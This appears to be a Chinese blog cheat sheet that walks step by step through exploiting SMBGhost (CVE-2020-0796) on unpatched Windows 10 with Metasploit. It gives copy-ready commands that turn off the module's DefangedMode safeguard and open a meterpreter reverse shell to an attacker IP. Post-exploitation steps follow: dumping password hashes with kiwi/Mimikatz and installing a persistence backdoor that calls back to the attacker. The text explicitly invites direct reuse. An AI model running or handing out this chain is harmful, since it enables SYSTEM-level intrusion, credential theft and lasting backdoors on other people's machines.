SMBGhost (CVE-2020-0796) 复现命令速查表

一、核心信息

  • 漏洞名称:SMBGhost / CVE-2020-0796

  • 目标系统:Windows 10 1903/1909 x64(10.0.18362.x,未打 KB4551762 补丁)

  • 权限结果 :直接获取 NT AUTHORITY\SYSTEM 最高权限

  • 关键环境:Metasploit Framework,攻击机与目标网络互通(同一网段)


二、完整操作流程(可直接复制复用)

复制代码

# 1. 启动Metasploit msfconsole -q # 2. 加载SMBGhost漏洞模块 use exploit/windows/smb/cve_2020_0796_smbghost # 3. 设置关键参数 set payload windows/x64/meterpreter/reverse_tcp # 稳定的Meterpreter反向Shell set RHOSTS 192.168.1.8 # 目标IP set LHOST 192.168.1.138 # 攻击机IP set DefangedMode false # 关闭安全保护模式,允许高危操作 # 4. 验证参数配置 show options # 5. 执行漏洞利用 run


三、关键日志解读(成功信号)

|-----------------------------------------------|------------------------------|
| 日志信息 | 说明 |
| Found low stub/PML4/HAL heap... | 漏洞利用的内核地址定位成功,漏洞触发流程正常 |
| KUSER_SHARED_DATA PTE NX bit cleared! | 绕过了系统的 NX 保护,payload 注入条件已满足 |
| Sending stage (232006 bytes) to 192.168.1.8 | Meterpreter payload 已成功发送到目标 |
| Meterpreter session 2 opened | 反向连接建立,Meterpreter 会话成功创建 |
| getuid → NT AUTHORITY\SYSTEM | 已获取 Windows 系统最高权限 |


四、关键避坑点(复盘必看)

  1. DefangedMode 必须关闭 模块默认开启该安全模式,会阻止高危操作,导致利用被强制终止,报错提示:Disable the DefangedMode option to proceed

  2. Payload 选择优化

    1. 优先使用 windows/x64/meterpreter/reverse_tcp,自带心跳保活,比普通shell/reverse_tcp更稳定,能避免模块后续恢复操作导致的会话误杀。

    2. 普通 shell 会话容易因 SMB 连接超时被关闭,Meterpreter 会话更耐断。

  3. 目标系统版本必须匹配 仅对 Windows 10 1903/1909 x64 有效,目标系统版本 10.0.18362 符合条件,且未安装 KB4551762 补丁。

  4. 蓝屏风险预警 该漏洞是内核级漏洞,利用后系统内核已被修改,目标大概率会在几分钟到几小时内蓝屏重启,会话无法长期保持,关键操作需一次性完成。


五、成功后可执行的核心操作(复盘拓展)

复制代码

# 1. 基础信息收集 sysinfo # 查看目标系统信息 getuid # 验证当前权限(SYSTEM) ps # 查看进程列表 netstat -ano # 查看网络连接 # 2. 密码Hash抓取(SYSTEM权限下) load kiwi # 加载Mimikatz模块 creds_all # 导出本地用户密码/Hash # 3. 持久化后门(可选,注意环境限制) run persistence -U -i 5 -p 443 -r 192.168.1.138 # 开机自启后门


六、复盘总结

本次利用成功的核心是:正确关闭了安全模式 + 选择了稳定的 Meterpreter payload + 目标系统版本匹配,最终实现了从漏洞触发到 SYSTEM 权限获取的完整流程。后续复现可直接套用上述命令,同时重点关注日志中的关键成功信号,快速判断利用状态。

相关推荐
网络安全零基础教程1 天前
网络安全春招面试避坑与复盘指南
linux·网络·安全·web安全·面试·职场和发展
汉堡包0011 天前
【工具分享】--威胁情报平台大全
学习·安全·web安全·信息安全
介一安全1 天前
【SRC】基础思路篇15:JWT安全测试完全指南
web安全·jwt·安全性测试·src
云水一下1 天前
零基础玩转bWAPP靶场(二十三):SQL 注入——存储型(SQLite)
web安全·sql注入·bwapp
白猫不黑1 天前
SQL注入实战:手工注入全流程详解
网络·数据库·sql·web安全·网络安全·信息安全
网安老伯3 天前
网络安全基础要点知识介绍(非常详细),零基础入门到精通,看这一篇就够了
运维·前端·网络协议·web安全·网络安全·职场和发展
绘梨衣的sakura路4 天前
Fastjson ≤ 1.2.83 新型 RCE 漏洞深度分析:三层绕过机制与完整利用链
安全·web安全·json
niaiheni4 天前
Fastjson 1.2.83 “Gadget-Free“ RCE
网络·安全·web安全
Draina4 天前
CBC填充预言攻击-CBC Padding Oracle Crypto Attack
python·安全·web安全·网络安全·密码学·安全性测试
白山云北诗4 天前
漏洞扫描+渗透测试:从资产摸底到风险验证,完成二次安全收口
网络·安全·web安全·渗透测试·漏洞扫描·ddos防护·cc防护